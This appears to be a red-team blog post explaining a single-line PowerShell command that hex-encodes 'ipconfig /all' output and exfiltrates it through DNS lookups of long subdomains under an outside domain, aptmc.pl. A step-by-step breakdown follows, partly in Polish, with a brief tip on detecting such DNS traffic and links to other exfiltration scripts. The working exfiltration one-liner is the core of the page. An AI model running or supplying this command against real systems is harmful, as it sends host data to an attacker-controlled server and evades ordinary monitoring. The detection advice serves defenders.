alphasec
PowerShell protip 008a
in 𝕏

DNS exfiltration in a single line

tty1 · powershell
PS> (-join ((ipconfig /all|out-string).ToCharArray()|%{"{0:X2}"-f[int]$_}) -split "(.{64})" -match "." -replace "([\w]{16})", "`$1.").trim('.')|%{ Resolve-DNSName "$_.$(($i++)).aptmc.pl"}
#PowerShell#RedTeam#Windows#DNS#Exfiltration

DNS exfiltration already appeared in protip 000d, but there it was a multi-line script. Here the same functionality is packed into a single command — strikingly similar to my favourite ICMP exfiltration oneliner from protip 0072.

How it works — step by step

Let's break the oneliner down:

-join (...)

Operator -join po lewej stronie wyrażenia złączy wszystkie znaki z tablicy znakiem pustym.

(ipconfig /all|Out-String)

Uruchamiamy ipconfig, a wynik wysyłamy do Out-String, dzięki czemu całość zostaje przekazana dalej jako jeden łańcuch znaków.

-split "(.{64})"

Dzielimy string separatorem zdefiniowanym wyrażeniem regularnym .{64} (dowolne 64 znaki). Nawias okrągły sprawia, że -split zwraca także same separatory.

%{ "{0:X2}"-f[int]$_ }

% to alias na ForEach-Object. Każdy znak zamieniamy na postać szesnastkową (wielkie litery, dokładnie 2 znaki).

-match "."

Operator -match filtruje tablicę, zostawiając tylko elementy zawierające jakiś znak — pozbywamy się pustych linii.

-replace "([\w]{16})", "`$1."

Każde 16 znaków zamieniamy na te same 16 znaków zakończone kropką — dzielimy domenę na subdomeny po 16 znaków. Końcową kropkę usuwamy metodą .trim('.').

Resolve-DNSName "$_.$(($i++)).aptmc.pl"

Budujemy pełną domenę z subdomen z payloadem i odpytujemy Resolve-DNSName — w ten sposób eksfiltrowane dane trafiają do serwera obsługującego domenę.

// for the blue team

What to catch: a flood of DNS queries for long, random-looking subdomains under the same parent domain. Monitor name length and entropy plus the count of unique subdomains per domain — a classic DNS tunnelling / exfiltration pattern.

DNS exfiltration in a single line
// data leaks out encoded in the subdomains of DNS queries

Useful links

Invoke-DNSExfil.ps1 — prosta funkcja do eksfiltracji po DNS github ↗ PowerShell Kung-Fu (CONFidence) — eksfiltracja i infiltracja po DNS w akcji video ↗ # protip 000d — eksfiltracja DNS większym skryptem protip ↗ # protip 0072 — analogiczny oneliner do eksfiltracji po ICMP protip ↗
••• All protips
// subscribe

New protips straight to your inbox.

Meaty oneliners and tricks from real engagements. No spam, no theory. Unsubscribe in one click.

newsletter language: